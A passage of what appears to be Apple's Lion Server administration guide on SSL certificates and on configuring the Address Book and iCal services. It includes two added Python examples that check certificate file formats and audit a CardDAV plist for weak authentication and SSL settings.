3. In the Settings pane, click the Edit button at the right of SSL Certificate.
4. From the Action pop-up menu, choose Manage Certificates.
5. Click + and then choose Import a Certificate Identity from the menu.
6. Drag the files containing the certificate and private key to the middle of the dialog.
7. Click the Import button and, if prompted, enter the private key passphrase.
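The extension of a certificate file says little about its encoding: a .cer or .crt may be PEM or binary DER, and a .p12 is a PKCS#12 bundle, yet only PEM can be imported here. The following script is an added example, not code from Lion Server or Apple's documentation: it identifies the format from the bytes, converts a DER certificate to PEM with the Python standard library, and checks a PEM bundle for the things that make an import fail (no private key, an encrypted key that will prompt for a passphrase, or a CSR dropped in by mistake). The byte strings it uses as samples are constructed stubs with a realistic outer ASN.1 structure, not real certificates.

```python
"""Identify and check certificate/key files before importing them.

Added example, not Apple's code.  PKCS#12 cannot be unpacked without a
passphrase and a crypto library, so it is reported rather than converted.
"""
import re
import ssl

PEM_BLOCK = re.compile(r"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.S)


def _tlv(data, off=0):
    """Decode one DER tag-length header at `off`: (tag, length, header_len)."""
    tag = data[off]
    first = data[off + 1]
    if first < 0x80:                              # short form length
        return tag, first, 2
    n = first & 0x7F                              # long form: n length bytes follow
    length = int.from_bytes(data[off + 2: off + 2 + n], "big")
    return tag, length, 2 + n


def identity_format(data):
    """Return "pem", "der-certificate", "pkcs12" or "unknown"."""
    if b"-----BEGIN " in data:
        return "pem"
    try:
        tag, length, hdr = _tlv(data)
        if tag != 0x30 or hdr + length != len(data):  # exactly one outer SEQUENCE
            return "unknown"
        inner_tag = data[hdr]
    except IndexError:                            # empty or truncated input
        return "unknown"
    # X.509 Certificate ::= SEQUENCE { tbsCertificate SEQUENCE, ... }
    # PKCS#12 PFX       ::= SEQUENCE { version INTEGER, ... }
    return {0x30: "der-certificate", 0x02: "pkcs12"}.get(inner_tag, "unknown")


def to_pem(data):
    """Convert what the standard library can; explain what it cannot."""
    fmt = identity_format(data)
    if fmt == "pem":
        return data.decode("ascii")
    if fmt == "der-certificate":
        return ssl.DER_cert_to_PEM_cert(data)
    raise ValueError(f"cannot convert {fmt} here; for PKCS#12 use: "
                     "openssl pkcs12 -in identity.p12 -out identity.pem -nodes")


def check_bundle(pem_text):
    """Problems that would make the import fail or import the wrong thing."""
    labels = [m.group(1) for m in PEM_BLOCK.finditer(pem_text)]
    problems = []
    if "CERTIFICATE" not in labels:
        problems.append("no certificate block")
    if not any(label.endswith("PRIVATE KEY") for label in labels):
        problems.append("no private key block")
    if "ENCRYPTED PRIVATE KEY" in labels:
        problems.append("private key is encrypted; have the passphrase ready")
    if "CERTIFICATE REQUEST" in labels:
        problems.append("bundle contains a CSR, not an issued certificate")
    return problems


# Constructed stubs: only the outer ASN.1 structure is realistic.
DER_CERT_STUB = b"\x30\x07\x30\x05\xa0\x03\x02\x01\x02"  # SEQ { SEQ { [0] INTEGER 2 } }
PKCS12_STUB = b"\x30\x03\x02\x01\x03"                    # SEQ { INTEGER 3 }
PEM_STUB = ("-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n"
            "-----BEGIN ENCRYPTED PRIVATE KEY-----\nAAAA\n-----END ENCRYPTED PRIVATE KEY-----\n")

if __name__ == "__main__":
    for name, blob in (("cert.cer", DER_CERT_STUB), ("identity.p12", PKCS12_STUB),
                       ("identity.pem", PEM_STUB.encode())):
        fmt = identity_format(blob)
        try:
            print(name, fmt, check_bundle(to_pem(blob)))
        except ValueError as err:
            print(name, fmt, err)
```

To use it on real files, read each file in binary mode and pass the bytes to identity_format and to_pem; a .crt that classifies as der-certificate is converted in place, and a .p12 is handed to openssl as the error message suggests.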


Obtain a CA-signed certificate


If your server requires a signed SSL certificate, use a self-signed certificate to request a signed certificate from an external certificate authority (CA). To obtain a signed certificate from a CA, you need a self-signed certificate. For instructions on creating a self-signed certificate, see Create a self-signed certificate. You can obtain a valid signed certificate by using the server's self-signed certificate to generate a certificate signing request (CSR) file, which you send to a known CA. The CSR contains your server's name and public key; the private key never leaves the server. If your request satisfies the authority, it generates and sends you a signed certificate. There is usually a fee involved with this service.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose Manage Certificates.
4. In the Manage Certificates sheet, select the self-signed certificate you want to use to generate the CSR.
5. From the Action pop-up menu, choose Generate Certificate Signing Request (CSR).
6. Save the CSR file. Some certificate authorities ask you to enter the CSR text in a field on a webpage instead of uploading a file. In that case, you can copy and paste the text to the CA's website.
7. Upload the CSR file to a CA following the instructions on their website. On the CA's website, look for SSL Certificates. You can use the CA of your choice. Here are a few CAs:
- Thawte, Inc. (www.thawte.com)
- VeriSign, Inc. (www.verisign.com)
- Comodo Group, Inc. (www.comodo.com)

After receiving your signed certificate from the CA, you can use it to replace your self-signed certificate. For information, see Use an SSL certificate.


Use an SSL certificate


Your server can use an SSL certificate to provide additional security for services. The server can use an SSL certificate to identify itself electronically and communicate securely with users' computers and other servers on the local network and the Internet. The SSL certificate provides additional security for Address Book, iCal, iChat, mail, and web services. These services can use the certificate to encrypt and decrypt the data they send to and receive from applications on users' computers.

You can use the self-signed certificate created for your server when you set it up, or a self-signed certificate you created, but users' applications won't trust these and will display messages asking whether the user trusts your certificate. Using a signed certificate relieves users from the uncertainty and tedium of manually accepting your certificate in these messages. With a self-signed certificate, a man-in-the-middle attacker who presents a different self-signed certificate is indistinguishable from your server to users who are accustomed to accepting untrusted certificates; with a certificate signed by a CA the client trusts, the client verifies the certificate chain automatically and rejects an impostor's certificate. That is what lets users trust the services they access.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose an available certificate.

If the pop-up menu doesn't contain certificates, create a self-signed certificate. For instructions, see Create a self-signed certificate. To use a previously generated SSL certificate, import it.

RELATED INFORMATION

Obtain a CA-signed certificate
Replace certificates

User collaboration services

Address Book service

About Address Book service

Provide centralized contact information


Address Book service provides a consolidated, server-hosted contact list. Address Book Server is the contact service for Lion Server. Built on open standard protocols, Address Book Server provides a simple-to-implement, secure, hosted address book solution. You can access personal and group contacts across multiple computers within a workgroup, a small business, or a large corporation.

Address Book Server is the Lion Server-hosted contact management solution for your organization's needs. It provides the following:
- Access to client address books anywhere there's a web connection
- Integration with Address Book, Mail, iCal, and iChat in Mac OS X version 10.6 and later
- Compatibility with any applications that use the standard Address Book framework
- vCard caching for offline access

Address Book Server provides secure, centralized storage for contact information. The server uses the CardDAV protocol, based on the widely used WebDAV protocol. It stores contacts as standard vCards for easy sharing. For more information about which clients can access Address Book Server, see Address Book Server client applications.

Address Book Server also lets you access contact information in your organization's directory by including directory users in your Address Book search results.

Before starting Address Book service, update your network's DNS records if needed.

Start Address Book service
1. In the Server app sidebar, select the service you want to start.
2. Click the On/Off switch to turn on the service.
3. If a dialog asks whether you want to allow Internet access to the service you turned on, click Allow to configure your AirPort device and make the service accessible to Internet users. Click Don't Allow if you don't want the service to be accessible to computers on the Internet, or if you're not sure.
You can change Internet access to services later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login.
The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device. These services include Address Book, iCal, iChat, Mail, and Web.
If you have an Internet router that isn't listed in the Server sidebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For information, see Router port mapping.

Add users, if needed
1. In the Users pane of the Server app, click the Add button (+).
2. In the Full Name field, enter the user's name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.
3. In the Account Name field, enter the user's short name. If you don't want to use the generated short name, enter a different short name. After the account is created, you can't change this short name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen).
Note: If a user has a short name on a Mac, try to use the same short name for the user's account on the server. Having the same short name helps with the user's access to services.
4. Enter the user's password in the Password and Verify fields. You can use Password Assistant to help you choose a password. Click the button at the right of the Password field to see how secure the password is. The user can change this password in the Users & Groups pane of System Preferences on the user's computer.
5. To associate a picture with the user account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computer's camera or choose a graphic file on your computer. After taking or choosing a picture, you can drag the picture to pan it, or use the slider to zoom it. When you finish customizing the picture, click Set.
6. Click Done to create the user account.

Allow directory searches
Directory contact searching lets Address Book Server clients search the directory services Address Book Server is bound to. This can include Lion Server-based computers that are configured to use Open Directory. It can also include an existing LDAP or Active Directory implementation. When directory searches are enabled, Address Book Server users can search their own contacts, the directory of users, and other shared directory contacts with a single search. Keep in mind that any client that can authenticate to Address Book service can then enumerate the directory's user records.
1. In the Server app, select the Address Book pane.
2. Select Include directory contacts in search.


Configuration tools
Address Book Server uses two front-end tools for configuration:
- serveradmin
- the Server app

In each case, the front-end tool reads from a configuration plist file (/etc/caldavd/carddavd.plist) to set service parameters. The plist file is an XML property list that specifies server options such as:
- The network TCP port to bind to
- Whether to use SSL
- The names and locations of support files


Address Book configuration options


You can customize Address Book Server settings using serveradmin for advanced control.

Directory Searching
  Allows clients bound to Address Book Server to get contacts and groups from directory servers that Address Book Server is bound to. To change this setting, see Configure directory search for Address Book service.
MaxCollectionsPerHome
  The maximum number of address books a user can create. To change this setting, see Change Address Book service user quotas.
MaxResourcesPerCollection
  The maximum number of contacts that a user can create in each address book. To change this setting, see Change Address Book service user quotas.
MaxResourceSize
  The maximum size in bytes of each contact. To change this setting, see Change Address Book service user quotas.
Authentication
  The authentication method required for address book access. To change this setting, see Choose and enable secure authentication for Address Book server.
Host Name
  The fully qualified domain name in DNS. It should be in the reverse lookup domain as well. To change this setting, see Change the Address Book server host name.
SSL
  Determines whether or not to use SSL encryption of network traffic. To change this setting, see Enable secure network traffic for Address Book server.
HTTP Port Number
  The port that Address Book Server uses for connections. The default port is 8800. To change this setting, see Change the Address Book server port number.
Log Level
  The degree of granularity with which Address Book Server logs are recorded. The default log level is Warning (warn). To change this setting, see Change the Address Book server logging level.


Start or stop Address Book service


From the command line, use serveradmin to start and stop service.

sudo serveradmin start addressbook
sudo serveradmin stop addressbook


Address Book Server client applications


Several clients can find users and groups in an Address Book server.

Apple applications
The following Apple applications can use Lion Server's Address Book Server:
- Address Book 5.0 or later. The version of Address Book that ships with Mac OS X v10.6 has built-in support for CardDAV and Address Book Server.
- Mail 4.0 or later. The version of Mail that ships with Mac OS X v10.6 has built-in support for Address Book Server, which is configured in the Composing pane of Mail preferences.
- iChat 5.0 or later. The version of iChat that ships with Mac OS X v10.6 has built-in support for finding users and groups with Address Book Server.
- Contacts app for iOS 4.0 or later. The version of Contacts that ships with iOS 4.0 has built-in support for CardDAV and Address Book Server.

Third-party applications
Any application that uses the Address Book framework also inherits support for Address Book Server, if the computer is bound to a server that has Address Book Server. For a client to use Address Book Server, the client must support the CardDAV protocol. Any application that supports the CardDAV protocol works with Address Book Server, although it might not take advantage of Mac OS X-specific additions to the CardDAV protocol.
RELATED TOPIC

Provide centralized contact information

User collaboration services

Address Book service

Configure Address Book

Configure directory search for Address Book service

Directory searching lets Address Book service clients search the directory services that Address Book service is bound to. This can include Mac OS X Server v10.5 implementations that are configured with the Directory application. It can also include any existing LDAP or Active Directory implementations.

1. Use serveradmin via the Terminal app to change the EnableSearchAddressBook flag from false to true.
sudo serveradmin settings addressbook:EnableSearchAddressBook = "true"
The default value is false.
2. Enable searching of the user accounts available to Address Book Server, searching of public shared contacts (as designated in Mac OS X Server v10.5), or both.
a. To share the user accounts, enter:
sudo serveradmin settings addressbook:DirectoryAddressBook:params:queryUserRecords = "true"
b. To share the contacts, enter:
sudo serveradmin settings addressbook:DirectoryAddressBook:params:queryPeopleRecords = "true"
3. Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook


Change the Address Book server host name


After setting up Address Book server, you can change the host name of Address Book server. It should be a fully qualified domain name matched with a reverse lookup record. Make the needed changes to your firewall to allow network access to the server.

1. Use serveradmin via the Terminal app to change the setting.
sudo serveradmin settings addressbook:ServerHostName = "<hostname>"
The default value for <hostname> is blank, meaning it is the host name of the current server.
Command example:
sudo serveradmin settings addressbook:ServerHostName = "chatter.example.com"
2. Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook


Change the Address Book server port number


You can change the port number clients use to connect to Address Book Server. When Address Book service is set up, it uses TCP port 8800. If you want to change the port, you can do so from the command line. Make the appropriate changes to your firewall to allow network access to the server on the new port.

1. Use serveradmin via the Terminal app to change the setting.
sudo serveradmin settings addressbook:HTTPPort = "<PortNumber>"
The default value for <PortNumber> is 8800.
Command example:
sudo serveradmin settings addressbook:HTTPPort = "8841"
2. Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook


Change Address Book service user quotas


Each Address Book user has a storage quota. This quota is the total possible size of all the user's address books and vCards, and it is the product of the three limits below: with the default values (50 address books, 10000 contacts per address book, 1048576 bytes per contact) a single user could in principle store about 500 GB. Quotas aren't set on a per-user basis; they are set globally for all users. Each of those settings also affects the calendar server. Don't let the total of all your users' quotas exceed the storage capacity of the data store, and be aware that raising MaxResourceSize to hundreds of megabytes, as in the example below, lets one vCard consume that much of the store.

1. Use serveradmin via the Terminal app to set the quota limits.
sudo serveradmin settings addressbook:MaxCollectionsPerHome = "<Number>"
sudo serveradmin settings addressbook:MaxResourcesPerCollection = "<Number>"
sudo serveradmin settings addressbook:MaxResourceSize = "<FileSize>"

MaxCollectionsPerHome
  The maximum number of address books a user can create. Default value: 50
MaxResourcesPerCollection
  The maximum number of contacts that a user can create in each address book. Default value: 10000
MaxResourceSize
  The maximum size in bytes of each contact. Default value: 1048576

Command example:
sudo serveradmin settings addressbook:MaxCollectionsPerHome = "100"
sudo serveradmin settings addressbook:MaxResourcesPerCollection = "12000"
sudo serveradmin settings addressbook:MaxResourceSize = "209715200"
2. Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook


Choose and enable secure authentication for Address Book server


Users authenticate to Address Book Server through one of the following methods:

Kerberos v5
  Uses strong encryption and is used in Mac OS X Lion for single sign-on to services offered by Lion Server. It is the recommended authentication method supported by Lion Server. Selecting this method requires the exclusive use of Kerberos authentication.
Digest
  HTTP Digest access authentication (RFC 2617). The password itself never crosses the network: the client sends a hash of the password combined with a server-supplied nonce, so Digest protects passwords without a trusted third party (like a Kerberos realm) and without maintaining a Kerberos infrastructure. It does not encrypt the rest of the traffic; use SSL for that. Selecting this method requires the exclusive use of Digest authentication.
Basic
  Plain-text authentication. The password is sent in the clear, so enable Basic only for clients that support nothing else, and only together with SSL (see Enable secure network traffic for Address Book server).

Use serveradmin via the Terminal app to enable MD5 Digest authentication.
sudo serveradmin settings addressbook:Authentication:Digest:Enabled = "<setting>"
The default value for <setting> is yes.
Command example:
sudo serveradmin settings addressbook:Authentication:Digest:Enabled = "yes"

Use serveradmin via the Terminal app to enable Kerberos authentication.
sudo serveradmin settings addressbook:Authentication:Kerberos:Enabled = "<setting>"
The default value for <setting> is yes.
Command example:
sudo serveradmin settings addressbook:Authentication:Kerberos:Enabled = "yes"

If you choose Kerberos authentication, make sure you set the Kerberos principal via the Terminal app.
sudo serveradmin settings addressbook:Authentication:Kerberos:ServicePrincipal = "<hostname>"
The default value for <hostname> is blank, meaning it is set for the localhost.
Command example:
sudo serveradmin settings addressbook:Authentication:Kerberos:ServicePrincipal = "SAMPLE.REALM.EXAMPL

Use serveradmin via the Terminal app to enable plain-text authentication.
sudo serveradmin settings addressbook:Authentication:Basic:Enabled = "<setting>"
The default value for <setting> is no.
Command example:
sudo serveradmin settings addressbook:Authentication:Basic:Enabled = "yes"

Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook


Enable secure network traffic for Address Book server


When you enable Secure Sockets Layer (SSL), you encrypt all the data sent between Address Book Server and the client. To enable SSL, you must select a certificate. If you use the default self-signed certificate, a client must choose to trust the certificate before it can make a secure connection. You can use a certificate on the server, or choose to use a certificate on another computer. Redirecting HTTP requests to the SSL port (below) does not protect credentials a client has already sent to the plain HTTP port; if only SSL connections are acceptable, also block the HTTP port at the firewall.

Use serveradmin via the Terminal app to change the SSL port number.
sudo serveradmin settings addressbook:SSLPort = "<PortNumber>"
The default value for <PortNumber> is 8443.
Command example:
sudo serveradmin settings addressbook:SSLPort = "8882"

Use serveradmin via the Terminal app to set the location of the PEM SSL certificate.
sudo serveradmin settings addressbook:SSLCertificate = "<CertLocation>"
The default value for <CertLocation> is /etc/certificates/.
Command example:
sudo serveradmin settings addressbook:SSLCertificate = "/etc/certificates/"

Use serveradmin via the Terminal app to set the location of the PEM private key.
sudo serveradmin settings addressbook:SSLPrivateKey = "<PrivateKeyLoc>"
The default value for <PrivateKeyLoc> is /etc/certificates/.
Command example:
sudo serveradmin settings addressbook:SSLPrivateKey = "/etc/certificates/"

Use serveradmin via the Terminal app to set the location of the PEM authority chain file.
sudo serveradmin settings addressbook:SSLAuthorityChain = "<ChainFile>"
The default value for <ChainFile> is /etc/certificates/.
Command example:
sudo serveradmin settings addressbook:SSLAuthorityChain = "/etc/certificates/"

Use serveradmin via the Terminal app to redirect insecure requests to the SSL port, if needed.
sudo serveradmin settings addressbook:RedirectHTTPToHTTPS = "<setting>"
The default value for <setting> is no.
Command example:
sudo serveradmin settings addressbook:RedirectHTTPToHTTPS = "yes"

Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook
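The authentication and SSL settings from the two sections above interact: Basic authentication is only tolerable when clients are steered to the SSL port, and Kerberos needs its service principal. The following script is an added example, not code from Lion Server or Apple's documentation: it reads a carddavd.plist (the file the Configuration tools section names as the backing store for these settings), reports the combinations a reviewer would flag, and pairs each with the serveradmin command that corrects it. It assumes that a serveradmin key path addressbook:A:B:C corresponds to nested plist keys A/B/C; the plist embedded in it is constructed for the example.

```python
"""Audit Address Book Server authentication and SSL settings from its plist.

Added example, not Apple's code.  Reads a carddavd.plist and returns
findings with the serveradmin commands that fix them.
"""
import plistlib

DEFAULT_MAX_RESOURCE_SIZE = 1048576   # 1 MiB, the default from the quota section

# Constructed sample: Basic auth on, no redirect to SSL, Kerberos enabled
# without a principal, and the per-contact size limit raised to 200 MiB.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>ServerHostName</key><string>chatter.example.com</string>
  <key>HTTPPort</key><integer>8800</integer>
  <key>SSLPort</key><integer>8443</integer>
  <key>RedirectHTTPToHTTPS</key><false/>
  <key>Authentication</key><dict>
    <key>Basic</key><dict><key>Enabled</key><true/></dict>
    <key>Digest</key><dict><key>Enabled</key><true/></dict>
    <key>Kerberos</key><dict>
      <key>Enabled</key><true/>
      <key>ServicePrincipal</key><string></string>
    </dict>
  </dict>
  <key>MaxResourceSize</key><integer>209715200</integer>
</dict></plist>
"""


def load_settings(plist_bytes):
    """Parse the XML plist into nested dicts (plistlib handles the DTD-less form)."""
    return plistlib.loads(plist_bytes)


def get(settings, path, default=None):
    """Look up a serveradmin-style key path such as Authentication:Basic:Enabled."""
    node = settings
    for key in path.split(":"):
        if not isinstance(node, dict) or key not in node:
            return default
        node = node[key]
    return node


def fix(path, value):
    """The serveradmin command that sets one key, in the form the sections above use."""
    return f'sudo serveradmin settings addressbook:{path} = "{value}"'


def audit(settings):
    """Return (finding, remediation command) pairs; an empty list means nothing to flag."""
    findings = []
    basic_on = get(settings, "Authentication:Basic:Enabled", False)
    redirected = get(settings, "RedirectHTTPToHTTPS", False)
    if basic_on and not redirected:
        findings.append((
            "Basic authentication is enabled and plain HTTP is not redirected to the "
            "SSL port, so passwords can cross the network in clear text",
            fix("Authentication:Basic:Enabled", "no"),
        ))
    kerberos_on = get(settings, "Authentication:Kerberos:Enabled", False)
    if kerberos_on and not get(settings, "Authentication:Kerberos:ServicePrincipal"):
        findings.append((
            "Kerberos is enabled but no service principal is set",
            fix("Authentication:Kerberos:ServicePrincipal", "<principal>"),
        ))
    size = get(settings, "MaxResourceSize", DEFAULT_MAX_RESOURCE_SIZE)
    if size > DEFAULT_MAX_RESOURCE_SIZE:
        findings.append((
            f"MaxResourceSize is {size} bytes; one contact may consume that much of the data store",
            fix("MaxResourceSize", DEFAULT_MAX_RESOURCE_SIZE),
        ))
    return findings


if __name__ == "__main__":
    for finding, command in audit(load_settings(SAMPLE_PLIST)):
        print(f"{finding}\n    {command}")
```

On a Lion Server, pass the bytes of /etc/caldavd/carddavd.plist to load_settings instead of the sample; the commands it prints are the same serveradmin invocations shown in the sections above, to be followed by the usual stop and start of the service.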

User collaboration services

Address Book service

Monitoring Address Book

Change the Address Book server logging level


The default logging level for Address Book Server is Warning. The Warning level of logging provides the second-lowest level of detail. You can change this to the lowest level (Error) or a higher level (Info or Debug).

1. Use serveradmin via the Terminal app to change the log level.
sudo serveradmin settings addressbook:DefaultLogLevel = "<LogLevel>"
The default value for <LogLevel> is warn. Replace <LogLevel> with one of the following: error, warn, info, debug.
Command example:
sudo serveradmin settings addressbook:DefaultLogLevel = "debug"
2. Restart Address Book service.
sudo serveradmin stop addressbook
sudo serveradmin start addressbook


View Address Book server logs


You can view and filter the logs to troubleshoot the service or monitor overall service reliability. Address Book Server keeps two logs: one for access (/var/log/caldavd/access.log) and one for errors (/var/log/caldavd/error.log). It shares these logs with the calendar service.

Use one of the following command-line tools to read the log files: less or cat to view a log, or tail to actively watch changes to a log file. For example, to track the error log:
tail -f /var/log/caldavd/error.log
For more information about using these command-line tools, see their man pages.


View Address Book server vital status


You can find information about the state of Address Book Server, including whether it's running, when it started running, and how many requests are being made, using the command line.

Use serveradmin via the Terminal app to see vital statistics about the service.
sudo serveradmin status addressbook
For the fuller report, including the start time and request counts, use:
sudo serveradmin fullstatus addressbook

User collaboration services

Calendar service

Understanding Calendar

Manage shared calendars


iCal Server is the shared calendar service. Built on open standard protocols, iCal Server provides integration with leading calendaring programs. It's easy to share calendars, schedule meetings, and coordinate events in a workgroup, a small business, or a large corporation. iCal Server provides a full calendaring solution, including:
- Attachments: Events can have file attachments associated with them, so every event participant can have a copy of a file or meeting agenda.
- Delegation (proxy) support: Other users can be authorized to view your calendar events, track subordinates, resources, or other designated calendar users. Proxies allow event-scheduling delegation as well.
- Directory support: iCal Server works with Open Directory and Active Directory to provide calendar service for users.
- Mail notifications: Event attendees without calendar accounts can get an email invitation with event information.
- Event invitations: Users can invite others to an event. When the recipient acknowledges the invitation, the scheduler gets the RSVP.
- Detailed access controls: iCal Server fully supports access control lists (ACLs) for events and attachments.
- Free/busy browsing: When scheduling an event, a user can see if invitees are available to accept an invitation.
- Location and resource scheduling: Resources (projectors, cars, and so forth) and locations can have calendars and can be invited to events.
- Multiple calendars: Each person or resource can have multiple calendars. Users can organize their calendars as needed.
- Push notification: Changes made to calendars and events are pushed to clients immediately.
- Server-side scheduling: Event invitations are processed on the server, freeing the client for better performance.

Before starting iCal service, you might need to update your network's DNS records.

Start iCal service
1. In the Server app sidebar, select the service you want to start.
2. Click the On/Off switch to turn on the service.
3. If a dialog asks whether you want to allow Internet access to the service you turned on, click Allow to configure your AirPort device and make the service accessible to Internet users. Click Don't Allow if you don't want the service to be accessible to computers on the Internet, or if you're not sure. You can change Internet access to services later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login.
The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device. These services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that isn't listed in the Server sidebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For information, see Router port mapping.

Add users, if needed
1. In the Users pane of the Server app, click the Add button (+).
2. In the Full Name field, enter the user's name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.
3. In the Account Name field, enter the user's short name. If you don't want to use the generated short name, enter a different short name. After the account is created, you can't change this short name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen).
Note: If a user has a short name on a Mac, try to use the same short name for the user's account on the server. Having the same short name helps with the user's access to services.
4. Enter the user's password in the Password and Verify fields. You can use Password Assistant to help you choose a password. Click the button at the right of the Password field to see how secure the password is. The user can change this password in the Users & Groups pane of System Preferences on the user's computer.
5. To associate a picture with the user account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computer's camera or choose a graphic file on your computer. After taking or choosing a picture, you can drag the picture to pan it, or use the slider to zoom it. When you finish customizing the picture, click Set.
6. Click Done to create the user account.

Create iCal resources and locations
Users and groups aren't the only parts of a calendaring system. Resources like projectors, microscopes, or cameras, and locations like conference rooms or buildings, must be scheduled, but they can't keep their own calendar. These resources and locations are like users and groups: they accept event invitations, and they have scheduling constraints. Therefore, they exist as principal entities on the calendar server for other users and groups to include in event invitations. Using the Server app, you can make a calendar for each resource and location in your organization. To have a delegate (or proxy) manage a location or resource calendar, the user of the iCal service must already exist before assigning delegate roles. Created locations and resources are reservable and can be set to accept event invitations automatically or through a delegate.
1. Click Add (+) to add a location or resource.
2. Enter the calendar type:

   Location
   Resource
3. Enter a name for the location or resource.
4. Choose how the location or resource will accept event invitations and mark the event as Busy:
   Automatically: Makes the calendar accept all invitations in the order in which they're received.
   With Delegate Approval: Holds event invitations until the designated delegate approves the invitation. You must provide a delegate.
5. Choose a delegate for the location or resource. Delegates are required if the location or resource is set to accept invitations with delegate approval. Delegates can also view and edit the resource calendar, even if they don't approve invitations. The delegate must be an existing iCal Server user or group. Only one delegated user or group can be assigned.

Enable email invitations
Attendees can be invited via email if they don't have an iCal Server account. When using the mail service on the same server as iCal service, iCal Server is already configured to send email notifications. All you have to do is turn on mail notifications and mail service. When an event attendee is added by email address and the host name of the email address isn't the same host name as the calendar server, iCal Server can send a message to the attendee with the event information. iCal Server must have its own mail account in the mail system.
iCal Server must be able to send mail to an outgoing mail server (an SMTP server) for relay, so you need the SMTP server host name and listening port. You must also make sure there are no firewalls blocking access to the mail server from the calendar server. The SMTP server must be configured to relay mail from the calendar server as well. iCal Server also requires access to an incoming mail server, POP or IMAP, for invitation notifications. These instructions assume the mail servers are configured and functioning. Email notifications can only be exchanged with external users. Users with an account on your iCal Server will receive a standard invitation in their calendar client software.
1. Create an email user account in the mail system, and note the mail address, account name, and password. For example, the iCal Server could access the account ical_server@example.com. If you need help creating a user account and giving it mail access, see Create a user account.
2. If you aren't using the same server to send mail and serve calendars, get the following settings for the incoming mail server from the mail administrator:
   Setting information              Example
   Server protocol                  POP or IMAP
   Email address                    ical_server@example.com
   Host name                        mail.example.com
   Listening port                   143
   Does mail service use SSL?       yes or no
   User name and password           a user name like ical_server@example.com
3. If you aren't using the same server to send mail and serve calendars, get the following settings for the outgoing (SMTP) mail server from the mail administrator:
   Setting information                       Example
   Host name                                 smtp.example.com
   Listening port                            25
   Does mail service use SSL?                yes or no
   User name and password                    a user name like ical_server@example.com
   Required authentication method, if any    CRAM-MD5 or Kerberos
4. In the Server app, select the iCal Server pane.
5. Select Allow invitations using email addresses.
6. If you aren't using the same server to send mail and serve calendars, click Edit to configure the settings.
7. Enter the mail server information, and then click Next.

RELATED TOPICS
About calendar resources and locations
Delete iCal resources and locations

User collaboration services > Calendar service > Understanding Calendar

About iCal Server configuration tools

iCal Server uses any of four front-end tools. All these tools read from a configuration plist file (/etc/caldavd/caldavd.plist) to set service parameters. The plist file is an XML property list that specifies server options such as:
- The network TCP port to bind to
- Whether to use SSL
- The names and locations of support files

Tool                              Description
Server app                        An app that focuses on easy configuration using built-in default settings.
serveradmin                       A command-line tool used to automate service configuration tasks and remote administration.
caldavd                           The command-line interface of the Darwin Calendar Server daemon.
calendarserver_manage_principals  A command-line tool used to add locations and resources to your iCal server.
calendarserver_purge_principals   A command-line tool used to remove locations and resources from your iCal server.

User collaboration services > Calendar service > Understanding Calendar

Account settings for iCal clients

To add an iCal Server account to iCal, you must know the following settings for the user name and calendar server location. Some of these settings are usable by other CalDAV clients.
For all accounts:
- The calendar user's short name. For example, John Doe might have johndoe as a short name.
- The calendar user login name. In iCal, the login name takes the form <calendar user's short name>@<iCal Server domain name>.
- The iCal Server domain name. This is the fully qualified domain name of the calendar server (for example, cal.example.com). You can use only the domain name (for example, example.com) if the domain has an SRV DNS record for calendar service.
- The iCal Server port number. This is the TCP port that the iCal Server is listening on.
- Whether the iCal Server uses SSL encryption or not.
- The calendar account location for account creation. If automatic discovery fails, the account URL is http://server:port/principals/users/username/. If the calendar client doesn't support automatic discovery (like Mac OS X v10.5 iCal 3.0), the account URL is http://server:port/calendars/__uids__/<GUID>, where GUID is the user's globally unique identifier.
Optional:
- The user GUID. The user GUID is a Distributed Computing Environment (DCE) compatible universally unique identifier string created by the directory service for a user when his or her directory record is created. It usually looks something like this: 95432C72-0035-4399-9447-8531601AA699.

User collaboration services > Calendar service > Understanding Calendar

About backing up and restoring calendar files

In addition to backing up the configuration files, you should back up the data store. The location of the data store is shown in the Settings tab of the iCal Server administration pane of Server Admin. Because iCal Server files are both a postgres database and flat files, you need to use a backup procedure that backs up both kinds of files. You should maintain the original files' POSIX permissions and ACL entries. Your backup solution must preserve extended attributes. You don't need to back up calendar database files in the file hierarchy; they are disposable. Your backup software needs root access to the /Library/Server/Calendar and Contacts/ folder (or whatever path you configured using serveradmin) and its subfolders to back them up.
Lion Server provides several command-line tools for data backup and restoration:
- pg_dump: Use to generate a text file with SQL commands that, when fed back to the server, will recreate the database in the same state as it was at the time of the dump.
- psql: Use to read in the text files created by pg_dump.
- rsync -E: Use to keep a backup copy of your data in sync with the original. The -E flag is mandatory because it preserves file extended attributes. The rsync tool only copies files that have changed, but always copies extended attributes.
- ditto: Use to perform full file-level backups.
